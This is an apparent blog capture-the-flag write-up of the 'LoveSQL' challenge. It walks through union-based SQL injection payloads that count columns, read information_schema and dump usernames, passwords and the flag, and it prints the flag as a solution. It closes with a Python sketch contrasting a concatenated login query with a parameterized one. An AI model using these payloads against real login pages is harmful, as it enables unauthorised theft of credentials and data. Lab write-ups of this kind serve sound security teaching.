web20 ([Geek Challenge 2019] LoveSQL):

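1. Enter 1 for both the username and the password and check the response (it reports a wrong password) ---> change the username to 1' (the page returns an SQL error, so the quote reaches the query unescaped: this is the injection point)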

2. Enter the following as the username, one at a time:

1' order by 4#
1' order by 1#
1' order by 3#

The tests show that the query returns 3 columns (order by 4 fails, order by 3 succeeds)

Find which columns are echoed back in the page:

1' union select 1,2,3#

Union query:
Dump the database name: geek

1' union select 1,database(),3#


Dump the table names: geekuser and l0ve1ysq1

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#


Dump the column names: both tables have the same 3 columns: id, username, password

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='geekuser'#
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#

Dump the flag:

1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1#

FLAG:flag{4d07dd44-e99d-4512-9b7e-f6702d1e9aa5}
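Why step 1 produces an error, and what removes the injection point: the sketch below is an added example, not the challenge's own code. It assumes the login query is built by string concatenation, uses an in-memory SQLite table named after l0ve1ysq1 with a constructed row, and the function names are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the challenge table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table l0ve1ysq1 (id integer, username text, password text)")
    db.execute("insert into l0ve1ysq1 values (1, 'admin', 'constructed-secret')")
    return db


def login_vulnerable(db, username, password):
    # Assumed pattern: user input is pasted into the SQL text, so a quote in
    # the username ends the string literal and the rest is parsed as SQL.
    sql = ("select id, username, password from l0ve1ysq1 "
           "where username='" + username + "' and password='" + password + "'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    # Bound parameters: the driver passes the values separately from the
    # statement, so quotes, 'union' and '#' are only data to compare against.
    sql = "select id, username, password from l0ve1ysq1 where username=? and password=?"
    return db.execute(sql, (username, password)).fetchone()


def probe(login, db, username):
    """Return what the login page would show for this username (password is 1)."""
    try:
        row = login(db, username, "1")
    except sqlite3.OperationalError:
        # The input changed the structure of the statement. MySQL treats '#'
        # as a comment; SQLite rejects it, but either way the input was parsed.
        return "sql error"
    return "login ok" if row else "wrong password"


if __name__ == "__main__":
    db = make_db()
    for name in ["1", "1'", "1' union select 1,2,3#"]:
        print(repr(name), "| concatenated:", probe(login_vulnerable, db, name),
              "| parameterized:", probe(login_safe, db, name))
```

With the parameterized version every input from the walkthrough is answered with the same "wrong password" response, so there is no error or echoed column to observe.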

posted @ 2024-12-05 21:13  舌口